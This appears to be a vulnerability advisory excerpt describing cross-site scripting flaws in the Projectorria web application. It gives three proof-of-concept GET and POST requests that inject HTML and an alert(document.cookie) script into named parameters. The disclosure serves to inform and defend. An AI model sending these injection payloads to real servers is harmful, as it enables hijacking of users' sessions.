A malicious user can inject arbitrary HTML/script code in the affected parameters.
Example 1 (GET Request):
http://<projectorria-server>/view/parameter.php?type="><H1><marquee>This+is+an+XSS+example<!--
Example 2 (GET Request):
http://<projectorria-server>/view/main.php?directAccessPage=parameter.php&menuActualStatus=visible&p1name=test&p1value=");alert(document.cookie);
Example 3 (POST Request):
POST /view/objectDetail.php?destinationWidth=1017 HTTP/1.1
Host: <projectorria-server>
objectClass=Affectation<H1><marquee>This+is+an+XSS+example<!--&objectId=42&listIdFilter=&listFilterClause=